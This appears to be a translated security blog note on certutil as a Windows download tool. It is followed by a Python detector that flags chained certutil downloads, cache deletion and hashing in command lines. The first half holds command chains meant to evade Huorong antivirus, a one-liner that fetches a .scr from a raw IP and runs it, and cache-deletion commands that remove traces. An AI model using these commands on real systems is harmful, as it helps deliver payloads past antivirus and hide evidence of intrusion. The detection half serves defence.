The plain download command:
certutil -urlcache -split -f http://test.com/360.exe

(screenshot: Huorong alert on the download)

As the screenshot shows, Huorong (火绒) flags it. Simple bypass attempts by chaining a harmless certutil in front of the real one (these still do not get past Huorong: it alerts on any command line that downloads an .exe, however the command is chained; note that the third variant fetches a .scr instead of an .exe):

certutil & certutil -urlcache -split -f http://test.com/360.exe
certutil | certutil -urlcache -split -f http://test.com/360.exe
certutil | certutil -urlcache -split -f http://47.99.168.203/fastjson反序列化分析2.scr && .\fastjson反序列化分析2.scr

certutil leaves a lot of cache entries behind; list them with:

certutil -urlcache *

(screenshot: certutil -urlcache * output)

To keep certutil from leaving a cache entry, append delete, which removes the cache entry for that URL:

certutil -urlcache -split -f http://io.com delete

You can also clear the whole cache:

certutil -urlcache * delete

Verifying file hashes with certutil:

certutil -hashfile mimikatz.exe MD5     // MD5
certutil -hashfile mimikatz.exe SHA1    // SHA1
certutil -hashfile mimikatz.exe SHA256  // SHA256

(screenshot: certutil -hashfile output)

Reference: https://forum.butian.net/share/612
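The chained variants above work against a detector that only looks at the start of the command line: `certutil & certutil -urlcache ...` does not begin with `certutil -urlcache`, so a prefix match never fires. The following is an added example, not code from the original post, showing the defensive side of every command on this page: it splits a cmd.exe command line on its `&`, `&&`, `|` and `||` operators and classifies every certutil segment as a download, a cache listing, a cache deletion (the `delete` forms above) or a `-hashfile` run. The sample command lines are constructed for the example (the example.test host and payload.scr name are placeholders), and the tokenizer is a plain whitespace split, so a quoted path containing spaces would need a Windows-aware splitter.

```python
"""Flag certutil downloads, cache cleanup and hashing in process command lines.

Added example, not from the original post. Models Sysmon Event ID 1 style
CommandLine values and checks every chained segment, not just the first.
"""
import re
from typing import Optional

# cmd.exe separators; the two-character forms come first so "&&" is not
# split into "&", "&".
SEPARATORS = re.compile(r"\s*(?:&&|\|\||\||&)\s*")
URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Constructed sample events for this example; example.test is a placeholder host.
SAMPLE_EVENTS = [
    "certutil -urlcache -split -f http://test.com/360.exe",
    "certutil & certutil -urlcache -split -f http://test.com/360.exe",
    "certutil | certutil -urlcache -split -f http://example.test/payload.scr && .\\payload.scr",
    "certutil -urlcache *",
    "certutil -urlcache -split -f http://io.com delete",
    "certutil -urlcache * delete",
    "certutil -hashfile mimikatz.exe SHA256",
    "certutil -dump cert.cer",
]


def naive_prefix_match(cmdline: str) -> bool:
    """The weak check the chaining trick defeats: only the line start is examined."""
    return cmdline.lower().startswith("certutil -urlcache")


def split_cmd(cmdline: str) -> list[str]:
    """Split a cmd.exe command line into the segments run by its operators."""
    return [seg for seg in SEPARATORS.split(cmdline) if seg.strip()]


def is_certutil(token: str) -> bool:
    """True if the token names certutil, with or without a path or .exe suffix."""
    name = token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in ("certutil", "certutil.exe")


def classify_segment(segment: str) -> Optional[tuple[str, str]]:
    """Return (verdict, argument) for one certutil invocation, or None."""
    tokens = segment.split()
    if not tokens or not is_certutil(tokens[0]):
        return None
    # certutil options are written -opt (it also accepts /opt); everything
    # else is a positional argument such as the URL, "*", "delete" or a file.
    opts = {t.lstrip("-/").lower() for t in tokens[1:] if t[0] in "-/"}
    args = [t for t in tokens[1:] if t[0] not in "-/"]
    if "urlcache" in opts:
        if args and args[-1].lower() == "delete":
            # Trailing "delete" removes the cache entry for the URL (or all of them)
            target = args[-2] if len(args) > 1 else "*"
            return ("cache_delete", target)
        urls = [a for a in args if URL_RE.match(a)]
        if urls:
            return ("download", urls[0])
        return ("cache_list", args[0] if args else "")
    if "hashfile" in opts and args:
        return ("hashfile", args[0])
    return None


def scan(cmdline: str) -> list[tuple[str, str]]:
    """All certutil verdicts in a command line, inspecting every chained segment."""
    found = []
    for seg in split_cmd(cmdline):
        verdict = classify_segment(seg)
        if verdict:
            found.append(verdict)
    return found


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(f"naive={naive_prefix_match(event)!s:5} scan={scan(event)}  <- {event}")
```

Run over the sample events, `naive_prefix_match` is true only for the first line, while `scan` reports the download in all three chained variants, the `delete` forms as `cache_delete`, and the hashing command as `hashfile`; the unrelated `-dump` invocation produces nothing.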